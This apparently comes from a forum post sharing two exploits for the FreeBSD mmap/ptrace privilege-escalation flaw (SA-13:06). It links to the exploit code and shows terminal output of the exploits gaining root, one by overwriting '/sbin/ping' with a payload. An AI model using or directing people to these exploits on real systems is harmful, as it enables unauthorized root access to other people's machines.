I've found this two code for privilege escalation. I've tested on FreeBSD 10 and it works fine! x(
Info: http://www.mondounix.com/freebsd-mmap-privilege-escalation/
Advisory: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
Test:
Code: http://www.mondounix.com/freebsd-9-0-9-1-mmap-ptrace-exploit/
Code:
[user@freebsd10 ~]$ uname -a
FreeBSD freebsd10 10.0-CURRENT FreeBSD 10.0-CURRENT
Info: http://www.mondounix.com/freebsd-mmap-privilege-escalation/
Advisory: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
Test:
Code:
[user@freebsd10 ~]$ ./b
[+] Saved old '/sbin/ping'
[+] Using mmap-ed area at 0x801000000
[+] Attached to 1264
[+] Copied 7435 bytes of payload to '/sbin/ping'
[+] Triggering payload
# id
uid=0(root) gid=0(wheel)
# exit
[+] Restoring '/sbin/ping'
[+] Done
Code: http://www.mondounix.com/freebsd-9-0-9-1-mmap-ptrace-exploit/
Code:
[user@freebsd10 ~]$ ./c
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <fbsd9lul@hunger.hu>
# id
uid=0(root) gid=0(wheel)